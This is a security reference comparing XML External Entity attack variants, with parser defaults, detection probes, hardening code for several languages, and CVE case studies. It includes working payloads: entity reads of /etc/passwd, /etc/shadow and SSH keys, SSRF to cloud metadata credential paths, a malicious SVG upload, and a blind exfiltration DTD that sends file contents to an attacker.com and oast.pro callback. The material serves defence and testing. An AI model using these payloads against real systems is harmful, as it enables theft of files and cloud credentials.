Comparative overview of XML External Entity attack classes — file disclosure, SSRF, blind OOB, XInclude, DTD upload — with parser-specific behaviors and detection signals.
TL;DR
<xi:include> works when <!DOCTYPE is blocked; it requires a separate setXIncludeAware(false) in Java.

XML External Entity (XXE) injection is not a single attack technique but a class of vulnerabilities stemming from one root cause: XML parsers that resolve external resources (files, URLs, internal services) when processing attacker-controlled XML. The W3C XML specifications include several features that enable this: DOCTYPE external entities, parameter entities for complex DTD composition, and XInclude for document assembly. Each of these mechanisms can be abused independently, creating five distinct attack variants with different payloads, different prerequisites, and different parser settings required for prevention.
Understanding the differences matters because security teams often harden against one variant while leaving others fully active. The most common gap is disabling DOCTYPE-based entities while leaving XInclude processing enabled — CVE-2025-31200 (LibreOffice, CVSS 7.1) is the canonical real-world example. A second gap is hardening direct XML API endpoints while leaving file upload processors (accepting SVG, docx, xlsx) uninspected.
XXE appears in OWASP A05:2021 (Security Misconfiguration) because every instance is a parser that was shipped or deployed with unsafe defaults and never hardened. It is not a logic vulnerability — the parser is doing exactly what the specification allows. The fix is configuration, not application code changes.
The common thread across all variants: the XML parser makes a network or filesystem request initiated by attacker-controlled content. Prevention requires eliminating the parser's ability to make these requests, not filtering the content of requests.
| Variant | CWE | Prerequisites | DOCTYPE Required | OOB Needed | Typical CVSS |
|---|---|---|---|---|---|
| Classic File Disclosure | CWE-611 | XML API, full document control | Yes | No | 7.5 |
| SSRF via XXE | CWE-611 | XML API, network access from server | Yes | No | 8.2 |
| Blind OOB XXE | CWE-611 | XML API, outbound from server | Yes | Yes | 7.5–8.3 |
| XInclude Injection | CWE-827 | Partial XML control (body position) | No | No | 7.1–7.5 |
| DTD Upload | CWE-611 | File upload (SVG/docx/xlsx/ODT) | Yes (in file) | No | 7.0–9.4 |
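One way to read the table is as a set of prerequisites that a given control removes. The sketch below transcribes the rows into a small data structure and asks which variants remain once a control is in place. The `Variant` class and `surviving_variants` function are hypothetical names introduced for illustration, and the model assumes (optimistically) that a DOCTYPE block is applied to every parser in the system, including upload processors.

```python
from dataclasses import dataclass
from typing import List


@dataclass(frozen=True)
class Variant:
    name: str
    cwe: str
    doctype_required: bool
    oob_needed: bool


# Rows transcribed from the comparison table above.
VARIANTS = [
    Variant("Classic File Disclosure", "CWE-611", True, False),
    Variant("SSRF via XXE", "CWE-611", True, False),
    Variant("Blind OOB XXE", "CWE-611", True, True),
    Variant("XInclude Injection", "CWE-827", False, False),
    Variant("DTD Upload", "CWE-611", True, False),
]


def surviving_variants(doctype_blocked: bool, egress_blocked: bool) -> List[str]:
    """Return the variants whose prerequisites still hold under the given controls."""
    remaining = []
    for variant in VARIANTS:
        if doctype_blocked and variant.doctype_required:
            continue  # assumption: DOCTYPE is rejected by every parser involved
        if egress_blocked and variant.oob_needed:
            continue  # out-of-band exfiltration needs outbound connectivity
        remaining.append(variant.name)
    return remaining


print(surviving_variants(doctype_blocked=True, egress_blocked=False))
```

Under these assumptions, blocking DOCTYPE everywhere still leaves XInclude Injection in the result, which is the defense gap the overview describes.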
Different XML parsers have different defaults and different configuration APIs. Understanding parser-specific behavior is critical for both attack (knowing which parsers are vulnerable) and defense (knowing what to configure).
| Parser | External Entities Default | Disable External Entities | Disable XInclude |
|---|---|---|---|
| Java Xerces/JAXP | Enabled (pre-hardening) | setFeature("http://apache.org/xml/features/disallow-doctype-decl", true) | setXIncludeAware(false) |
| libxml2 (C/PHP) | Enabled before v2.9.0; disabled by default v2.9.0+ | Do NOT pass LIBXML_NOENT (it enables entity substitution despite the name); for PHP 8.0+ use libxml_set_external_entity_loader(null) | Separate XML_PARSE_XINCLUDE flag |
| MSXML 6+ / .NET XmlReader | Enabled by default | VBScript/JScript: set ProhibitDTD = true; .NET: set XmlResolver = null on XmlDocument or DtdProcessing = DtdProcessing.Prohibit on XmlReaderSettings | Not natively supported |
| Python lxml | Enabled with resolve_entities=True | XMLParser(resolve_entities=False, no_network=True) | Never call .xinclude() on untrusted content |
| Python xml.etree | Safe for XXE (raises ParseError on external entities; does NOT resolve them), but vulnerable to Billion Laughs DoS | Use defusedxml for full belt-and-suspenders (blocks DoS too) | N/A (XInclude is never applied during parsing) |
| .NET XmlDocument | Enabled by default | XmlResolver = null + DtdProcessing = DtdProcessing.Prohibit | Not natively supported |
| Node.js fast-xml-parser | Disabled v4+; enabled v3 | v4+ default safe; v3: processEntities: false | Not supported |
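| PHP SimpleXML/DOM | Enabled (libxml2 backend) | libxml_set_external_entity_loader(null) (PHP 8.0+) | Do not pass LIBXML_XINCLUDE or call DOMDocument::xinclude() on untrusted content (LIBXML_NOXINCNODE only suppresses marker nodes; it does not disable XInclude) |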
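The xml.etree row can be checked directly with the standard library. The following is a minimal sketch, assuming CPython's bundled `xml.etree.ElementTree`; the helper name `rejects_external_entity` is hypothetical. It feeds the parser a document that declares and references an external entity and reports whether the parser refused it.

```python
import xml.etree.ElementTree as ET

# Declares an external general entity and references it in the body.
CLASSIC_PAYLOAD = """<?xml version="1.0"?>
<!DOCTYPE foo [
<!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<root>&xxe;</root>"""


def rejects_external_entity(xml_text: str) -> bool:
    """Return True if the stdlib parser refuses the document instead of resolving it."""
    try:
        ET.fromstring(xml_text)
    except ET.ParseError:
        # ElementTree does not fetch the external entity; the reference is
        # reported as an error rather than substituted.
        return True
    return False
```

A check like this only covers external entity resolution. It says nothing about entity-expansion DoS, which is why the table still recommends defusedxml.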
The simplest variant. The attacker controls a full XML document with DOCTYPE and injects a general external entity pointing to a local file:
<?xml version="1.0"?>
<!DOCTYPE foo [
<!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<root>&xxe;</root>

The server reflects entity content in the HTTP response. This variant requires in-band reflection: if the application processes the XML internally without returning entity values, it fails and Blind OOB must be used instead.
High-value targets beyond /etc/passwd: /proc/self/environ (runtime environment variables), /proc/self/cmdline (application startup command), application config files (/app/.env, config.yml, database.yml), SSH private keys (/root/.ssh/id_rsa).
See Classic File Disclosure for full payload library and detection evidence examples.
Replace the file:// URI with an http:// URI to pivot from XXE to Server-Side Request Forgery:
<!DOCTYPE foo [
<!ENTITY ssrf SYSTEM "http://169.254.169.254/latest/meta-data/iam/security-credentials/ec2-role">
]>
<root>&ssrf;</root>

The XML parser makes an HTTP GET request to the target URL and substitutes the response as the entity value. AWS IMDSv1 (no token required) is the canonical target. IMDSv2 requires a PUT request with the X-aws-ec2-metadata-token-ttl-seconds header first; XXE general entities cannot send custom headers, so IMDSv2 provides partial mitigation. GCP's metadata.google.internal requires a Metadata-Flavor: Google header and is similarly resistant to standard XXE SSRF.
CVE-2024-36522 (SAP BusinessObjects, CVSS 9.4) used XXE SSRF to traverse the internal network and reach administrative interfaces not exposed externally.
See SSRF via XXE for internal network scanning techniques and IMDSv2 bypass research.
The most prevalent variant in modern applications. The server parses XML and resolves entities, but the entity value is never returned in the HTTP response. Exploitation requires a two-stage parameter entity chain and attacker-controlled callback infrastructure:
<!-- Stage 1: payload delivered to target -->
<?xml version="1.0"?>
<!DOCTYPE foo [
<!ENTITY % sp SYSTEM "http://attacker.com/exfil.dtd">
%sp;
%param1;
]>
<root/>

<!-- exfil.dtd hosted on attacker.com -->
<!ENTITY % file SYSTEM "file:///etc/passwd">
<!ENTITY % param1 "<!ENTITY % exfil SYSTEM 'http://UNIQUE.oast.pro/?d=%file;'>">
%exfil;

The target server fetches exfil.dtd, reads /etc/passwd, and makes an HTTP request to the attacker's Interactsh server carrying the file contents as a URL parameter. The HTTP response from the target contains no entity content.
CVE-2024-22024 (Ivanti Connect Secure, CVSS 8.3) — blind OOB in SAML AuthnRequest processing — was exploited against production VPN concentrators before a patch was available.
See Blind OOB for DNS exfiltration, FTP exfiltration (Java/Xerces WAF bypass), and error-based alternatives when egress is blocked.
XInclude injection bypasses DOCTYPE-based defenses entirely. Instead of DTD entity syntax, it uses W3C XInclude elements in the XML body — no DOCTYPE declaration is needed:
<root xmlns:xi="http://www.w3.org/2001/XInclude">
<xi:include parse="text" href="file:///etc/passwd"/>
</root>

This applies when an attacker can inject XML content into a body position (element content, request parameter) but cannot control the document's DOCTYPE. It also applies when the application explicitly blocks DOCTYPE but processes XInclude, a common defense gap.
In Java JAXP, disallow-doctype-decl=true does not disable XInclude. setXIncludeAware(false) is a separate, independent setting that must be explicitly configured. CVE-2025-31200 (LibreOffice ODT, CVSS 7.1) is the cleanest published proof of this gap: DOCTYPE XXE was blocked; XInclude was not.
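Because XInclude lives in ordinary elements rather than in the DTD, it can be spotted without any DOCTYPE handling at all. The sketch below is an audit aid, not a fix: it uses the standard library parser (which does not apply XInclude during parsing) to list the `href` targets of any include elements in a document. The function name `find_xinclude_hrefs` is hypothetical.

```python
import xml.etree.ElementTree as ET

XI_NS = "http://www.w3.org/2001/XInclude"


def find_xinclude_hrefs(xml_text: str) -> list:
    """List href targets of XInclude elements in the document.

    Matching is done on the namespace URI, so the prefix the sender
    chose (xi:, x:, or anything else) does not matter.
    """
    root = ET.fromstring(xml_text)
    return [element.get("href") for element in root.iter("{%s}include" % XI_NS)]


sample = (
    '<root xmlns:xi="http://www.w3.org/2001/XInclude">'
    '<xi:include parse="text" href="file:///etc/passwd"/>'
    "</root>"
)
print(find_xinclude_hrefs(sample))  # → ['file:///etc/passwd']
```

Note that the sample contains no DOCTYPE, so a parser configured only with disallow-doctype-decl would accept it. The include is neutralised only when XInclude processing itself is off.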
See XInclude Injection for xi:fallback enumeration technique and per-parser configuration details.
File upload endpoints that accept XML-based formats (SVG, docx, xlsx, ODT, WSDL) are an often-missed XXE surface. These formats are ZIP archives of XML parts (docx/xlsx/ODT) or plain XML files (SVG/WSDL), and either kind can carry a DOCTYPE declaration:
<!-- Malicious SVG — submitted as an avatar/image upload -->
<?xml version="1.0" standalone="yes"?>
<!DOCTYPE foo [ <!ENTITY xxe SYSTEM "file:///etc/shadow"> ]>
<svg width="500px" height="100px" xmlns="http://www.w3.org/2000/svg">
<text font-size="16">&xxe;</text>
</svg>

When the server processes the uploaded file (thumbnail generation, document conversion, metadata extraction, virus scanning via Apache Tika), the embedded DOCTYPE entity is resolved. The disclosed content may appear in the HTTP response, in a generated thumbnail, in server logs, or only via OOB callback.
CVE-2025-66516 (Apache Tika, CVSS 10.0) — document ingestion pipelines using Tika for content extraction triggered XXE via PDF-embedded XFA forms and XML documents.
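Since docx/xlsx/ODT uploads are ZIP archives of XML parts, a rough triage step is to look inside the archive before it reaches a converter. The following sketch flags XML-like members that contain a DOCTYPE marker or the XInclude namespace. It is a detection aid under stated assumptions, not a substitute for parser hardening: the function name, suffix list, and 1 MiB read limit are all illustrative choices, and a plain byte search will miss members stored in UTF-16 or other non-ASCII-compatible encodings.

```python
import io
import zipfile

XML_SUFFIXES = (".xml", ".rels", ".svg")  # assumption: members worth inspecting
MARKERS = {
    "doctype": b"<!DOCTYPE",
    "xinclude": b"http://www.w3.org/2001/XInclude",
}


def suspicious_members(data: bytes, limit: int = 1 << 20) -> dict:
    """Map archive member name -> list of marker names found in that member."""
    findings = {}
    with zipfile.ZipFile(io.BytesIO(data)) as archive:
        for info in archive.infolist():
            if not info.filename.lower().endswith(XML_SUFFIXES):
                continue
            # Read a bounded prefix so a decompression bomb cannot exhaust memory.
            with archive.open(info) as member:
                body = member.read(limit)
            hits = [name for name, needle in MARKERS.items() if needle in body]
            if hits:
                findings[info.filename] = hits
    return findings
```

A legitimate Office document normally has no reason to include either marker in its parts, so any hit is worth logging even when the downstream parser is believed to be hardened.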
See DTD Upload for docx/xlsx manipulation techniques and Tika-specific payloads.
A small probe set sharing one Interactsh token can cover all XXE variants when submitted to both XML API endpoints and file upload endpoints:
Canary payload for XML API:
<?xml version="1.0"?>
<!DOCTYPE x [
<!ENTITY % sp SYSTEM "http://YOUR-TOKEN.oast.pro/xxe-api-probe">
%sp;
]>
<root/>

Canary SVG for file upload:
<?xml version="1.0" standalone="yes"?>
<!DOCTYPE svg [
<!ENTITY % sp SYSTEM "http://YOUR-TOKEN.oast.pro/xxe-upload-probe">
%sp;
]>
<svg xmlns="http://www.w3.org/2000/svg" width="1" height="1"/>

XInclude canary (run after DOCTYPE probe returns 400):
<root xmlns:xi="http://www.w3.org/2001/XInclude">
<xi:include parse="text" href="http://YOUR-TOKEN.oast.pro/xinclude-probe"/>
</root>

Monitor Interactsh for DNS and HTTP callbacks. A DNS-only callback is POTENTIAL (confidence 0.30); an HTTP callback is CONFIRMED (confidence 0.75+); an HTTP callback with file content in URL parameters is CONFIRMED HIGH (0.98).
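The confidence tiers above can be written down as a small classifier over observed callbacks. This is a sketch under assumptions: the `Callback` record is a hypothetical shape (it is not an Interactsh API type), 0.75 is used as the floor of the "0.75+" tier, and file content is assumed to arrive in a non-empty `d` query parameter, as in the exfil.dtd example.

```python
from dataclasses import dataclass
from urllib.parse import parse_qs


@dataclass
class Callback:
    protocol: str    # "dns" or "http"
    query: str = ""  # raw query string of an HTTP callback, if any


def classify(callbacks) -> tuple:
    """Return (label, confidence) for the strongest signal among the callbacks."""
    label, confidence = "NONE", 0.0
    for cb in callbacks:
        if cb.protocol == "http" and parse_qs(cb.query).get("d"):
            candidate = ("CONFIRMED HIGH", 0.98)  # exfiltrated content present
        elif cb.protocol == "http":
            candidate = ("CONFIRMED", 0.75)       # parser fetched the URL
        elif cb.protocol == "dns":
            candidate = ("POTENTIAL", 0.30)       # name resolved, nothing fetched
        else:
            continue
        if candidate[1] > confidence:
            label, confidence = candidate
    return label, confidence
```

DNS-only hits are kept at low confidence because resolvers, proxies, and security scanners can look up a hostname without the XML parser ever requesting it.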
Prevention requires hardening each parser independently. The universal principle: disable external entity resolution and XInclude processing before accepting attacker-controlled XML.
// Java JAXP — covers classic XXE + SSRF + blind OOB + DTD upload
DocumentBuilderFactory dbf = DocumentBuilderFactory.newInstance();
dbf.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
dbf.setFeature("http://xml.org/sax/features/external-general-entities", false);
dbf.setFeature("http://xml.org/sax/features/external-parameter-entities", false);
dbf.setXIncludeAware(false); // SEPARATE flag — prevents XInclude injection
dbf.setExpandEntityReferences(false);

# Python: defusedxml for ElementTree; lxml requires explicit config
from defusedxml import ElementTree as ET
tree = ET.fromstring(xml_input) # safe by default
# lxml — must configure explicitly
from lxml import etree
parser = etree.XMLParser(resolve_entities=False, no_network=True, load_dtd=False)
tree = etree.fromstring(xml_bytes, parser=parser)
# Never call tree.xinclude() on untrusted content

// .NET: XmlResolver = null prevents all external fetch
var settings = new XmlReaderSettings {
DtdProcessing = DtdProcessing.Prohibit,
XmlResolver = null
};
using var reader = XmlReader.Create(stream, settings);

<?php
// PHP 8.0+ — null loader blocks all external entity resolution
libxml_set_external_entity_loader(null);
$doc = new DOMDocument();
$doc->loadXML($xml);

Defense gap: Most hardening guides cover only DOCTYPE-based XXE. XInclude requires a separate parser flag (setXIncludeAware(false) in Java, avoiding .xinclude() in Python lxml). File upload processors require the same hardening as XML API endpoints: Apache Tika, LibreOffice conversion services, and ImageMagick SVG renderers all parse XML internally and require explicit configuration.
CVE-2025-66516 — Apache Tika (CVSS 10.0, 2025)
Apache Tika's document content extraction, used in enterprise search platforms, AI RAG pipelines, and document management systems, triggered XXE via XFA-embedded XML in PDF documents and via XInclude in certain document types. Unauthenticated document uploads are common in these systems. The CVSS 10.0 score reflects the broad deployment surface — Tika is a transitive dependency in thousands of Java applications.
CVE-2024-22024 — Ivanti Connect Secure (CVSS 8.3, 2024)
Ivanti's SAML endpoint processed XML AuthnRequests with blind OOB XXE capability. The server made outbound HTTP requests when resolving parameter entities in attacker-crafted SAML assertions. Combined with CVE-2023-46805 (authentication bypass), attackers achieved unauthenticated blind OOB XXE against production VPN concentrators globally. This CVE appeared in CISA KEV and was exploited in the wild before patching.
CVE-2025-31200 — LibreOffice XInclude (CVSS 7.1, 2025)
The canonical defense-gap example. LibreOffice had blocked DOCTYPE-based XXE in ODT processing. The XInclude code path was left enabled. Malicious ODT files with xi:include elements disclosed files when documents were opened or processed by automated conversion services. Patched in LibreOffice 25.2.3.
Blind OOB XXE is the most prevalent in contemporary applications. Modern API responses rarely reflect raw XML entity values — the XML is parsed internally without the entity content appearing in the HTTP response. This means most real-world XXE vulnerabilities require out-of-band techniques (DNS or HTTP callbacks via Interactsh or Burp Collaborator) for exploitation confirmation, not classic in-band file disclosure.
XInclude injection (CWE-827) bypasses filters that block or disable DOCTYPE declarations. XInclude uses namespace-qualified XML elements (<xi:include href='file:///etc/passwd' parse='text'/>) instead of DTD entity syntax. A parser with DOCTYPE disabled but XInclude awareness enabled — a common misconfiguration — is fully vulnerable. CVE-2025-31200 (LibreOffice, CVSS 7.1) confirmed this defense gap.
libxml2 versions before 2.9.0 (2012) resolve external entities by default. Java Xerces/JAXP resolves external entities until the relevant features are explicitly hardened. PHP's SimpleXML and DOM extensions (backed by libxml2) resolve external entities on older libxml2 builds unless libxml_disable_entity_loader(true) is called (deprecated in PHP 8.0+), and on any version when LIBXML_NOENT is passed. Python's xml.etree.ElementTree does not process external entities by default, but lxml resolves entities unless configured with resolve_entities=False (alongside no_network=True). Node.js fast-xml-parser v4+ disables DTD by default; v3 and earlier enabled it.
XXE SSRF works by setting the external entity URI to an HTTP URL: <!ENTITY ssrf SYSTEM 'http://169.254.169.254/latest/meta-data/iam/security-credentials/'>. The XML parser makes an HTTP request to the URL and substitutes the response content. Primary targets: AWS IMDSv1 (169.254.169.254), GCP metadata (metadata.google.internal), Azure IMDS (169.254.169.254/metadata/instance), internal Kubernetes API (10.96.0.1:443), Redis (127.0.0.1:6379), internal admin panels. IMDSv2 (token-required) partially mitigates cloud metadata theft.
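When reviewing rejected payloads or parser logs, it helps to sort the SYSTEM identifiers by what they were aiming at. The sketch below does this with the standard library only. The category labels, the `classify_entity_target` name, and the short metadata host set (taken from the targets listed above) are illustrative assumptions, and hostnames are not resolved, so a public name that points at an internal address is reported only as an unresolved hostname.

```python
import ipaddress
from urllib.parse import urlsplit

# Metadata endpoints named in the text above.
METADATA_HOSTS = {"169.254.169.254", "metadata.google.internal"}


def classify_entity_target(system_id: str) -> str:
    """Categorise the target of an external entity's SYSTEM identifier."""
    parts = urlsplit(system_id)
    scheme = parts.scheme.lower()
    host = (parts.hostname or "").lower()
    if scheme == "file":
        return "file-disclosure"
    if scheme not in ("http", "https", "ftp"):
        return "other"
    if host in METADATA_HOSTS:
        return "ssrf-cloud-metadata"
    try:
        address = ipaddress.ip_address(host)
    except ValueError:
        return "hostname-unresolved"  # could be OOB callback or internal name
    if address.is_loopback or address.is_private or address.is_link_local:
        return "ssrf-internal"
    return "external-address"
```

For example, `http://10.96.0.1:443/` and `http://127.0.0.1:6379/` both fall under `ssrf-internal`, while a callback domain such as an Interactsh host is left as `hostname-unresolved` for a human to judge.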
CWE-611 (Improper Restriction of XML External Entity Reference) covers classic XXE via DOCTYPE external entities and parameter entities. CWE-827 (Improper Control of Document Type Definition) covers XInclude injection — a related but distinct code path using W3C XInclude elements rather than DTD syntax. Both result in file disclosure and SSRF but require different parser settings to prevent. Scanning tools that only check for CWE-611 patterns will miss CWE-827 XInclude injection.
Key recent CVEs: CVE-2024-22024 (Ivanti Connect Secure SAML, CVSS 8.3) — OOB XXE in VPN concentrators. CVE-2025-31200 (LibreOffice, CVSS 7.1) — XInclude in ODT processing. CVE-2025-66516 (Apache Tika, CVSS 10.0) — XFA/XInclude in document ingestion pipelines. CVE-2024-40896 (libxml2 SAX handler bypass, CVSS 7.5) — believed-protected applications still resolving entities. CVE-2024-36522 (SAP BusinessObjects, CVSS 9.4) — SOAP endpoint XXE enabling internal network traversal.
Use a multi-vector probe sequence: (1) DOCTYPE entity with Interactsh token for classic/blind OOB; (2) xi:include with Interactsh token for XInclude; (3) file upload with malicious SVG containing both DOCTYPE and xi:include for DTD upload. Monitor Interactsh for DNS and HTTP callbacks. Any callback from the target IP/ASN confirms at least one variant. Use Burp Suite Pro active scanner as a first pass, then apply manual probes for XInclude and upload vectors that automated scanners miss.
JSON-only endpoints are not vulnerable to classic XXE. However, applications that accept both JSON and XML (via Content-Type negotiation), process SOAP envelopes internally, or parse XML documents from user-uploaded files (docx, xlsx, SVG, ODT, PPTX) remain vulnerable regardless of the API surface. File upload endpoints accepting structured file formats are a common overlooked XXE surface — all Office Open XML formats (docx/xlsx/pptx) are ZIP archives containing XML that is parsed on the server.
Inline XXE injects entities directly in a request body containing XML. DTD Upload XXE works through file upload endpoints that accept structured XML-based file formats: SVG images, docx/xlsx Office documents, XML configuration files, WSDL documents. The attacker crafts a malicious file (e.g., an SVG with an embedded DOCTYPE entity) and uploads it via a standard file upload form. The server-side processor parses the uploaded file and resolves the entities, disclosing files or making SSRF requests without the attacker having direct access to an XML API endpoint.
For Java (the most commonly hardened runtime): setting setFeature('http://apache.org/xml/features/disallow-doctype-decl', true) prevents classic XXE, SSRF via XXE, and blind OOB. In addition, setXIncludeAware(false) prevents XInclude injection; this is a separate flag not implied by the DOCTYPE feature. For Python: use defusedxml for all ElementTree operations; for lxml, set resolve_entities=False and no_network=True, and never call xinclude() on untrusted content. For PHP: use libxml_set_external_entity_loader(null) (PHP 8.0+). For .NET: set XmlResolver = null and DtdProcessing = DtdProcessing.Prohibit.
Classic file disclosure (/etc/passwd read) typically yields P3-P4. Reading application secrets (/app/.env, database credentials) escalates to P1-P2. SSRF via XXE reaching cloud metadata (IAM credentials) is P1 due to potential full account takeover. Blind OOB XXE without demonstrated data exfiltration is P3; with exfiltrated credentials is P1. XInclude injection without demonstrated impact is P3. DTD Upload XXE via SVG in an avatar upload is typically P3-P4 unless chained to credential disclosure. HackerOne reports #1379577 and #293795 both resulted in P3 awards.